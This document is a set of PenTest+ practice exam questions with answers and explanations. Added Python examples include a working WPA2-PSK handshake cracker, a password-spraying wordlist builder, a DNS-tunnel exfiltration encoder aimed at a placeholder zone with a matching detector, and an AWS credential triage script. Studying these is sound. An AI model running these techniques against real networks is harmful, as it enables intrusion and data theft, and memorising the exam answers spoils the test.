Practice Free PT0-003 Exam Online Questions
A penetration testing team needs to determine whether it is possible to disrupt wireless communications for PCs deployed in the client’s offices.
Which of the following techniques should the penetration tester leverage?
- A . Port mirroring
- B . Sidecar scanning
- C . ARP poisoning
- D . Channel scanning
D
Explanation:
Channel scanning (typically with a wireless interface in monitor mode) reveals which channels, BSSIDs and clients the office Wi-Fi actually uses, so a subsequent deauthentication or interference test can be aimed at the right frequencies and access points instead of blindly across the band. Note that active RF jamming is prohibited in many jurisdictions regardless of the client's consent (the FCC bans it in the US), so in practice the disruption test is an 802.11 deauthentication rather than raw jamming, and it must be explicitly covered in the rules of engagement because it interrupts real users.
Option A (Port mirroring) ❌ : Used for network traffic monitoring, not wireless disruption.
Option B (Sidecar scanning) ❌ : Not a commonly used technique in wireless testing.
Option C (ARP poisoning) ❌ : Used to manipulate ARP tables on wired networks, not for wireless interference.
Option D (Channel scanning) ✅ : Correct.
Identifies which Wi-Fi channels are in use.
Helps perform jamming, deauthentication, or interference attacks.
Reference: CompTIA PenTest+ PT0-003 Official Guide – Wireless Attacks and Security Testing
A penetration tester gains access to a Windows machine and wants to further enumerate users with native operating system credentials.
Which of the following should the tester use?
- A . route
- B . nbtstat
- C . net
- D . whoami
C
Explanation:
Windows provides built-in utilities for user enumeration and privilege escalation.
net command (Option C):
The net command is used to list users, groups, and shares on a Windows system:
net user
net localgroup administrators
net group "Domain Admins" /domain
Useful for gathering privilege escalation targets and understanding user permissions.
Reference: CompTIA PenTest+ PT0-003 Official Study Guide – "Windows Enumeration Commands"
Incorrect options:
Option A (route): Displays network routing tables, not user information.
Option B (nbtstat): Used for NetBIOS name resolution, but does not enumerate users.
Option D (whoami): Displays current logged-in user but does not list all users.
A penetration tester obtains a regular domain user’s set of credentials. The tester wants to attempt a dictionary attack by creating a custom word list based on the Active Directory password policy.
Which of the following tools should the penetration tester use to retrieve the password policy?
- A . Responder
- B . CrackMapExec
- C . Hydra
- D . msfvenom
B
Explanation:
CrackMapExec (CME) is the best choice because it supports authenticated enumeration against Active Directory and can retrieve the domain password policy using a valid, unprivileged domain account. In the PenTest+ methodology, once a tester holds a standard domain account, a common next step is to enumerate the domain settings that determine both attack feasibility and safety: minimum password length, complexity requirements, lockout threshold, lockout duration and observation window, and password history. These values directly inform how to build a policy-aware custom wordlist (there is no point guessing seven-character passwords against an eight-character minimum) and how to pace dictionary or spraying attempts so they stay inside the rules of engagement and below the lockout threshold.
Responder is primarily used for LLMNR/NBT-NS/mDNS poisoning and for capturing or relaying authentication on the local network; querying AD policy is not its function. Hydra is an online login brute-force tool that performs the guessing, not the policy retrieval. msfvenom is a payload generator for exploitation and post-exploitation delivery and has nothing to do with enumerating AD password policy. CME is therefore the appropriate tool to retrieve the policy before the dictionary is built.
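Turning the retrieved policy into a wordlist and a spraying budget, as an added example that is not part of the original page or of CrackMapExec: CME's `--pass-pol` option prints the values a domain user is allowed to read (minimum length, complexity flag, lockout threshold and window). The POLICY and BASE_WORDS below are constructed stand-ins for that output and for the client-specific seed words a tester would collect.

```python
"""Build a policy-aware wordlist and a safe spraying budget from an AD password policy.

Added example, not from the PenTest+ study material. POLICY and BASE_WORDS are
constructed to resemble what CrackMapExec's --pass-pol output would give you;
swap in the values retrieved from the target domain.
"""
import string
from dataclasses import dataclass


@dataclass(frozen=True)
class PasswordPolicy:
    min_length: int
    complexity: bool         # "Password must meet complexity requirements"
    lockout_threshold: int   # 0 = lockout disabled
    lockout_window_min: int  # "Reset account lockout counter after" (minutes)


# Constructed policy values, not retrieved from a real domain.
POLICY = PasswordPolicy(min_length=8, complexity=True,
                        lockout_threshold=5, lockout_window_min=30)
BASE_WORDS = ["summer", "welcome", "acme", "password"]


def char_classes(pw: str) -> int:
    """Count the AD complexity categories present (upper, lower, digit, symbol).
    AD also counts non-Latin Unicode letters as a fifth class; omitted here."""
    return sum((any(c.isupper() for c in pw),
                any(c.islower() for c in pw),
                any(c.isdigit() for c in pw),
                any(c in string.punctuation for c in pw)))


def meets_policy(pw: str, policy: PasswordPolicy, account: str = "") -> bool:
    """Mirror the checks a DC applies: length, 3-of-4 classes, and no
    account-name substring (AD rejects samAccountName parts of 3+ chars)."""
    if len(pw) < policy.min_length:
        return False
    if policy.complexity:
        if char_classes(pw) < 3:
            return False
        if len(account) >= 3 and account.lower() in pw.lower():
            return False
    return True


LEET = str.maketrans({"a": "@", "e": "3", "i": "1", "o": "0", "s": "$"})
SUFFIXES = ["", "!", "1", "123", "2024", "2025", "!1", "2025!"]


def mangle(base: str):
    """Yield the transformations users actually apply to satisfy complexity."""
    for word in (base, base.capitalize(), base.upper()):
        for suffix in SUFFIXES:
            yield word + suffix
            yield word.translate(LEET) + suffix


def build_wordlist(bases, policy: PasswordPolicy, account: str = "") -> list:
    """Every candidate that survives is something the DC would have accepted,
    so no guess is wasted on a password the policy forbids."""
    seen, out = set(), []
    for base in bases:
        for cand in mangle(base):
            if cand not in seen and meets_policy(cand, policy, account):
                seen.add(cand)
                out.append(cand)
    return out


def guesses_per_window(policy: PasswordPolicy):
    """Guesses per account per lockout window that stay under the threshold,
    keeping one attempt in reserve for the user's own typos."""
    if policy.lockout_threshold == 0:
        return None  # no lockout: only rate-limit for noise, not for safety
    return max(policy.lockout_threshold - 2, 0)


if __name__ == "__main__":
    words = build_wordlist(BASE_WORDS, POLICY)
    print(f"{len(words)} policy-compliant candidates, e.g. {words[:5]}")
    print(f"budget: {guesses_per_window(POLICY)} guesses per account "
          f"every {POLICY.lockout_window_min} minutes")
```

The filter removes roughly half of the naive mangling output for an eight-character, complexity-enabled policy, and the budget function is what keeps a spray from locking out the user population: with a threshold of 5, three guesses per account per observation window leaves room for the user's own mistakes.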
A penetration tester attempts to obtain the preshared key for a client’s wireless network.
Which of the following actions will most likely aid the tester?
- A . Deploying an evil twin with a WiFi Pineapple
- B . Performing a password spraying attack with Hydra
- C . Setting up a captive portal using SET
- D . Deauthenticating clients using aireplay-ng
D
Explanation:
Obtaining a wireless preshared key (PSK) in a WPA/WPA2-Personal environment typically relies on capturing the 4-way handshake (or equivalent key exchange) between a client and the access point. PenTest+ emphasizes that the handshake is captured when a client authenticates or reauthenticates to the network; once the handshake is collected, the tester can attempt an offline password attack to determine the PSK (subject to rules of engagement and authorization).
Using aireplay-ng to perform a deauthentication attack forces connected clients to disconnect and then automatically reconnect, which triggers a new handshake that can be captured by the tester’s monitoring interface. This directly supports the goal of acquiring material needed to recover the PSK.
An evil twin (A) and a captive portal (C) are social-engineering approaches aimed at harvesting credentials a user types, which suits enterprise (802.1X) or portal-based access better than extracting a WPA2-PSK. Password spraying with Hydra (B) targets online login services and does not apply to a WPA/WPA2 PSK, which is recovered offline from the captured handshake. Two caveats for the practitioner: the deauthentication is itself a short denial of service against real users and must be covered by the rules of engagement, and it fails on networks with Protected Management Frames (802.11w, mandatory in WPA3), where spoofed deauthentication frames are rejected and the WPA3 SAE handshake is not vulnerable to offline dictionary attacks.
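The offline step the handshake enables, written out as an added example (not aircrack-ng's code and not part of the original page): each candidate passphrase is stretched with PBKDF2 into a PMK, expanded into a PTK using the two MAC addresses and two nonces visible in the capture, and the first 16 bytes of that PTK are used to recompute the MIC on EAPOL message 2; a match means the candidate is the PSK. The SSID, addresses, nonces and frame below are constructed inside `make_handshake()` with a known passphrase so the block runs without a capture.

```python
"""Offline WPA2-PSK candidate verification against a captured 4-way handshake.

Added example, not from the PenTest+ guide. make_handshake() fabricates the
SSID, MACs, nonces and EAPOL message 2 with a known passphrase so the example
runs offline; on an engagement those fields come from the capture taken while
aireplay-ng deauthenticates a client.
"""
import hashlib
import hmac

# Offset of the 16-byte MIC inside an EAPOL-Key frame:
# EAPOL hdr(4) + desc type(1) + key info(2) + key len(2) + replay ctr(8)
# + nonce(32) + IV(16) + RSC(8) + ID(8) = 81
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    The 4096 iterations are the whole cost of each guess."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk, ap_mac, client_mac, anonce, snonce) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max of MACs and nonces).
    Only the first 16 bytes (the KCK) are needed to check the MIC."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b""
    for i in range(4):  # 4 x 160 bits >= 512 bits
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/CCMP): HMAC-SHA1 over the frame with the
    MIC field zeroed, truncated to 16 bytes."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def candidate_matches(passphrase: str, hs: dict) -> bool:
    pmk = pmk_from_passphrase(passphrase, hs["ssid"])
    kck = derive_ptk(pmk, hs["ap_mac"], hs["client_mac"], hs["anonce"], hs["snonce"])[:16]
    captured = hs["eapol"][MIC_OFFSET:MIC_OFFSET + 16]
    return hmac.compare_digest(eapol_mic(kck, hs["eapol"]), captured)


def crack_psk(wordlist, hs: dict):
    """First passphrase whose derived KCK reproduces the captured MIC, else None.
    WPA passphrases are 8-63 characters, so other entries are skipped unhashed."""
    for cand in wordlist:
        if 8 <= len(cand) <= 63 and candidate_matches(cand, hs):
            return cand
    return None


def make_handshake(passphrase: str, ssid: str = "CorpGuest") -> dict:
    """Constructed message 2 of the handshake (client -> AP, carries SNonce + MIC)."""
    ap_mac, client_mac = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
    anonce = hashlib.sha256(b"constructed anonce").digest()
    snonce = hashlib.sha256(b"constructed snonce").digest()
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")
    body = (b"\x02"                    # descriptor type: RSN
            + b"\x01\x0a"              # key info: pairwise | MIC | version 2
            + b"\x00\x00"              # key length (0 in message 2)
            + b"\x00" * 7 + b"\x01"    # replay counter
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8  # nonce, IV, RSC, ID
            + b"\x00" * 16             # MIC, filled in below
            + len(rsn_ie).to_bytes(2, "big") + rsn_ie)
    eapol = b"\x02\x03" + len(body).to_bytes(2, "big") + body  # 802.1X v2, EAPOL-Key
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), ap_mac, client_mac,
                     anonce, snonce)[:16]
    mic = eapol_mic(kck, eapol)
    eapol = eapol[:MIC_OFFSET] + mic + eapol[MIC_OFFSET + 16:]
    return {"ssid": ssid, "ap_mac": ap_mac, "client_mac": client_mac,
            "anonce": anonce, "snonce": snonce, "eapol": eapol}


HANDSHAKE = make_handshake("coffee-shop-2024")
WORDLIST = ["password", "12345678", "short", "welcome1", "coffee-shop-2024", "letmein123"]

if __name__ == "__main__":
    print("recovered PSK:", crack_psk(WORDLIST, HANDSHAKE))
```

The only expensive operation per guess is the 4096-iteration PBKDF2, which is why real crackers batch it on GPUs and why SSID-specific precomputed PMK tables exist: the salt is the network name, so the same passphrase on a differently named network costs a fresh derivation. Everything else (the PRF and the MIC) is cheap, and the nonces and addresses come straight from the two captured frames.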
A penetration tester is testing a power plant’s network and needs to avoid disruption to the grid.
Which of the following methods is most appropriate to identify vulnerabilities in the network?
- A . Configure a network scanner engine and execute the scan.
- B . Execute a testing framework to validate vulnerabilities on the devices.
- C . Configure a port mirror and review the network traffic.
- D . Run a network mapper tool to get an understanding of the devices.
C
Explanation:
When testing a power plant’s network and needing to avoid disruption to the grid, configuring a port mirror and reviewing the network traffic is the most appropriate method to identify vulnerabilities without causing disruptions.
Port Mirroring:
Definition: Port mirroring (SPAN – Switched Port Analyzer) is a method of monitoring network traffic by duplicating packets from one or more switch ports to another port where a monitoring device is connected.
Purpose: Allows passive monitoring of network traffic without impacting network operations or device performance.
Avoiding Disruption:
Non-Intrusive: Port mirroring is non-intrusive and does not generate additional traffic or load on the network devices, making it suitable for sensitive environments like power plants where disruption is not acceptable.
Other Options:
Network Scanner Engine: Active vulnerability scanning sends probes and exploit checks to every host, which can hang or crash fragile OT devices (PLCs, RTUs, protocol gateways) that were never built to tolerate unexpected input.
Testing Framework: Validating vulnerabilities on the devices means actively exercising them, which is disruptive by definition.
Network Mapper Tool: Running a network mapper (such as Nmap) actively scans the network and can disrupt services; even a plain port scan has been enough to take industrial controllers offline.
CompTIA Pentest+ Reference: Passive Monitoring: Passive techniques such as port mirroring are essential in environments where maintaining operational integrity is critical.
Critical Infrastructure Security: Understanding the need for non-disruptive methods in critical infrastructure penetration testing to ensure continuous operations.
By configuring a port mirror and reviewing network traffic, the penetration tester can identify vulnerabilities in the power plant’s network without risking disruption to the grid.
A client recently hired a penetration testing firm to conduct an assessment of their consumer-facing web application. Several days into the assessment, the client’s networking team observes a substantial increase in DNS traffic.
Which of the following would most likely explain the increase in DNS traffic?
- A . Covert data exfiltration
- B . URL spidering
- C . HTML scraping
- D . DoS attack
A
Explanation:
Covert data exfiltration (Option A):
DNS traffic can be leveraged for covert data exfiltration because it is almost always permitted outbound (at least to the organisation's own resolvers) and is rarely inspected as closely as HTTP.
DNS tunnelling tools encode data into the labels of queries for a domain the tester controls; every chunk becomes a new, unique name, so the technique produces an observable jump in query volume, which fits the spike the networking team noticed several days into the test.
Why Not Other Options?
B (URL spidering): Crawling the application generates HTTP traffic; the handful of hostnames it touches are resolved once and cached, so it does not cause a substantial increase in DNS traffic.
C (HTML scraping): Involves downloading website content, which primarily uses HTTP or HTTPS.
D (DoS attack): A DNS-based DoS would involve query floods from many sources against the client's name servers, not the behaviour expected from an authorised web application assessment.
CompTIA Pentest+ Reference: Domain 3.0 (Attacks and Exploits)
Covert Communication Techniques and DNS Tunneling
A penetration tester is attempting to exfiltrate sensitive data from a client environment without alerting the client’s blue team.
Which of the following exfiltration methods would most likely remain undetected?
- A . Cloud storage
- B . Email
- C . Domain Name System
- D . Test storage sites
C
Explanation:
The Domain Name System (DNS) is commonly used for covert exfiltration because it is an essential protocol in every network and is generally less scrutinised than other egress channels.
Here's how DNS exfiltration works:
Mechanism:
Data is encoded into DNS queries or responses, typically by placing base32- or hex-encoded chunks in the subdomain labels of a name under a domain the tester controls.
The compromised host sends these queries to its ordinary internal resolver, which forwards them through the recursive chain to the tester's authoritative name server; the host never needs a direct route to the tester, so the channel bypasses egress controls that only block unknown destinations.
Why It Remains Undetected:
DNS traffic is almost always allowed and is not monitored as closely as HTTP or email.
Network security tools prioritise keeping resolution working over inspecting query content, so anomalies in query length, entropy or volume go unnoticed unless DNS-specific analytics are in place.
Caveat: the channel is not invisible. Long, high-entropy labels and a large number of unique names under one zone are exactly what DNS monitoring looks for, so a blue team with resolver logging or a DNS firewall can catch it; tunnelling slowly with short labels trades throughput for stealth.
CompTIA Pentest+ Reference: Domain 3.0 (Attacks and Exploits)
Domain 5.0 (Reporting and Communication)
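How the encoding and the detection both work, as an added example covering this question and the previous one (not from the PenTest+ material): the sender splits data into base32 labels under a zone whose authoritative server the tester controls, and the detector computes, per registered zone, the query volume, the share of queries carrying a long label, and the entropy of that label, which is the kind of check a blue team's DNS analytics apply. `tunnel.example`, the payload and the resolver log lines are all constructed.

```python
"""DNS-tunnel style encoding and a volume/length/entropy detector.

Added example covering both DNS questions above; not from the PenTest+
material. ZONE is a placeholder for a domain whose authoritative server the
tester controls; SECRET and the query-log lines are constructed.
"""
import base64
import hashlib
import math
from collections import defaultdict

ZONE = "tunnel.example"        # placeholder attacker-controlled zone
MAX_LABEL, MAX_NAME = 63, 253  # RFC 1035 limits the encoder must respect

# Constructed payload. Real tunnels compress/encrypt first, so the bytes look
# random; chained SHA-256 output stands in for that here.
SECRET = b"".join(hashlib.sha256(b"constructed-%d" % i).digest() for i in range(38))


def encode_chunks(data: bytes, zone: str = ZONE, chunk: int = 30) -> list:
    """Split data into base32 labels: <seq>.<payload>.<zone>. 30 bytes -> 48 chars,
    so one label stays under the 63-character limit."""
    names = []
    for seq, off in enumerate(range(0, len(data), chunk)):
        label = base64.b32encode(data[off:off + chunk]).decode().rstrip("=").lower()
        name = f"{seq}.{label}.{zone}"
        assert len(label) <= MAX_LABEL and len(name) <= MAX_NAME
        names.append(name)
    return names


def decode_chunks(names, zone: str = ZONE) -> bytes:
    """Receiver side: reorder by sequence number, restore base32 padding."""
    chunks = {}
    for name in names:
        seq, label, rest = name.split(".", 2)
        if rest != zone:
            continue
        padded = label.upper() + "=" * (-len(label) % 8)
        chunks[int(seq)] = base64.b32decode(padded)
    return b"".join(chunks[i] for i in sorted(chunks))


def shannon_entropy(s: str) -> float:
    counts = defaultdict(int)
    for c in s:
        counts[c] += 1
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values()) if s else 0.0


def flag_tunnel_zones(log_lines, min_queries=20, long_label=30, min_entropy=3.5) -> dict:
    """Per registered zone: query count, share of queries with a long label, and
    mean entropy of the longest label. Lines are '<epoch> <client> <qname> <qtype>'."""
    per_zone = defaultdict(lambda: {"queries": 0, "long": 0, "entropy": 0.0})
    for line in log_lines:
        _, _, qname, _ = line.split()
        labels = qname.rstrip(".").split(".")
        zone = ".".join(labels[-2:])
        longest = max(labels, key=len)
        z = per_zone[zone]
        z["queries"] += 1
        z["long"] += int(len(longest) >= long_label)
        z["entropy"] += shannon_entropy(longest)
    flagged = {}
    for zone, z in per_zone.items():
        mean_entropy = z["entropy"] / z["queries"]
        if (z["queries"] >= min_queries and z["long"] / z["queries"] > 0.5
                and mean_entropy >= min_entropy):
            flagged[zone] = {"queries": z["queries"], "mean_entropy": round(mean_entropy, 2)}
    return flagged


def build_sample_log() -> list:
    """Constructed resolver log: ordinary lookups plus one client tunnelling SECRET."""
    t0 = 1_700_000_000
    benign = ["www.example.com", "mail.example.com", "cdn.example.net", "login.example.com"]
    lines = [f"{t0 + i} 10.0.0.{10 + i % 5} {benign[i % 4]} A" for i in range(60)]
    lines += [f"{t0 + i} 10.0.0.23 {name} TXT" for i, name in enumerate(encode_chunks(SECRET))]
    return lines


if __name__ == "__main__":
    print(flag_tunnel_zones(build_sample_log()))
```

Two things the run shows: the tunnel fits the RFC 1035 limits only because the encoder chunks to 30 bytes per label, and the properties that make it fit (long, high-entropy labels, many unique names under one zone) are exactly what flags it. Against a tuned detector the tester has to lower throughput and use shorter, lower-entropy labels, which is the trade-off behind "less likely to be scrutinised".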
A penetration testing team needs to determine whether it is possible to disrupt the wireless communications for PCs deployed in the client’s offices.
Which of the following techniques should the penetration tester leverage?
- A . Port mirroring
- B . Sidecar scanning
- C . ARP poisoning
- D . Channel scanning
D
Explanation:
Channel Scanning:
Wireless communications can be disrupted by identifying and interfering with the channels used by Wi-Fi networks.
Channel scanning allows the tester to map all active Wi-Fi channels, identify the target network, and determine possible jamming or interference strategies.
Why Not Other Options?
A (Port mirroring): This applies to wired network traffic duplication for monitoring purposes and is unrelated to wireless disruption.
B (Sidecar scanning): Not a relevant technique in the context of wireless disruption.
C (ARP poisoning): This targets Ethernet/IP communication in a local network, not wireless communication at the radio frequency level.
CompTIA Pentest+ Reference: Domain 3.0 (Attacks and Exploits)
Wireless Network Disruption Techniques
During an assessment on a client that uses virtual desktop infrastructure in the cloud, a penetration tester gains access to a host and runs commands.
The penetration tester receives the following output:
-rw-r--r--  1 comptiauser comptiauser  807 Apr  6 05:32 .profile
drwxr-xr-x  2 comptiauser comptiauser 4096 Apr  6 05:32 .ssh
-rw-r--r--  1 comptiauser comptiauser 3526 Apr  6 05:32 .bashrc
drwxr-xr-x  4 comptiauser comptiauser 4096 May 12 11:05 .aws
-rw-r--r--  1 comptiauser comptiauser 1325 Aug 21 19:54 .zsh_history
drwxr-xr-x 12 comptiauser comptiauser 4096 Aug 27 14:10 Documents
drwxr-xr-x 16 comptiauser comptiauser 4096 Aug 27 14:10 Desktop
drwxr-xr-x  2 comptiauser comptiauser 4096 Aug 27 14:10 Downloads
Which of the following should the penetration tester investigate first?
- A . Documents
- B . .zsh_history
- C . .aws
- D . .ssh
C
Explanation:
In a cloud-hosted VDI scenario, the highest-value next step is typically to identify cloud credentials and configuration artifacts that enable access beyond the single desktop instance. The .aws directory is a well-known location where AWS command-line tooling stores sensitive material such as credential profiles and configuration details (for example, access keys, session tokens, default regions, and named profiles). PenTest+ emphasizes post-exploitation enumeration that targets credential sources capable of expanding access and impact, especially in cloud environments where a single set of keys may permit interacting with storage, compute, identity, and management APIs.
While .ssh can contain private keys useful for pivoting to other servers, in many cloud deployments SSH keys are scoped to specific hosts, whereas cloud access keys can unlock broader control-plane capabilities depending on attached permissions. .zsh_history is valuable for discovering commands and potentially leaked secrets, but it is less direct than immediately checking for structured cloud credentials. User folders like Documents are lower priority compared to credential repositories that can rapidly escalate the assessment’s scope of access.
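What a first look at that directory involves, as an added example that is not part of the original page: ~/.aws/credentials holds the key material per profile while ~/.aws/config holds regions and role-assumption chains, and the key ID prefix tells you whether you found a durable IAM user key (AKIA) or a temporary STS credential (ASIA, always paired with a session token and an expiry). All identifiers below are placeholders.

```python
"""Triage of the ~/.aws directory found on the VDI host.

Added example, not from the PenTest+ guide. The two files are constructed in
the real layout of ~/.aws/credentials and ~/.aws/config; every key ID, secret,
account ID, role and profile name is a placeholder.
"""
import configparser

CREDENTIALS = """\
[default]
aws_access_key_id = AKIAEXAMPLE0000000001
aws_secret_access_key = EXAMPLEsecretEXAMPLEsecretEXAMPLEsecret00

[ci-temp]
aws_access_key_id = ASIAEXAMPLE0000000002
aws_secret_access_key = EXAMPLEsecretEXAMPLEsecretEXAMPLEsecret01
aws_session_token = EXAMPLEtokenEXAMPLEtokenEXAMPLEtoken
"""

CONFIG = """\
[default]
region = us-east-1

[profile ci-temp]
region = us-east-1

[profile prod-admin]
role_arn = arn:aws:iam::111111111111:role/Admin
source_profile = default
region = eu-west-1
"""


def key_kind(access_key_id: str) -> str:
    """AWS key ID prefixes: AKIA = long-term IAM user key, ASIA = temporary STS
    credential (comes with a session token and an expiry)."""
    if access_key_id.startswith("AKIA"):
        return "long-term"
    if access_key_id.startswith("ASIA"):
        return "temporary"
    return "unknown"


def triage(credentials_text: str, config_text: str) -> dict:
    creds, cfg = configparser.ConfigParser(), configparser.ConfigParser()
    creds.read_string(credentials_text)
    cfg.read_string(config_text)
    profiles = {}
    for name in creds.sections():
        sec = creds[name]
        profiles[name] = {"kind": key_kind(sec.get("aws_access_key_id", "")),
                          "session_token": "aws_session_token" in sec,
                          "assumes": None, "region": None}
    for section in cfg.sections():
        # config names sections "[profile name]" for everything except "[default]"
        name = section[len("profile "):] if section.startswith("profile ") else section
        p = profiles.setdefault(name, {"kind": "none", "session_token": False,
                                       "assumes": None, "region": None})
        p["region"] = cfg[section].get("region")
        if "role_arn" in cfg[section]:
            p["assumes"] = (cfg[section]["role_arn"], cfg[section].get("source_profile"))
    return profiles


def triage_order(profiles: dict) -> list:
    """Long-term keys first (they do not expire), then role profiles that chain
    from them, then temporary credentials that may already be dead."""
    rank = {"long-term": 0, "none": 1, "temporary": 2, "unknown": 3}
    return sorted(profiles, key=lambda n: (rank[profiles[n]["kind"]], n))


if __name__ == "__main__":
    found = triage(CREDENTIALS, CONFIG)
    for name in triage_order(found):
        p = found[name]
        line = f"{name}: {p['kind']} keys, region {p['region']}"
        if p["assumes"]:
            line += f", assumes {p['assumes'][0]} via profile {p['assumes'][1]}"
        print(line)
```

Once the profiles are sorted, the standard read-only check is `aws sts get-caller-identity --profile <name>`, which confirms the account and principal the keys map to. It is recorded in CloudTrail, so it is the first detectable action against the control plane and should be taken deliberately, and a role profile such as prod-admin is only as alive as the source profile it chains from.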
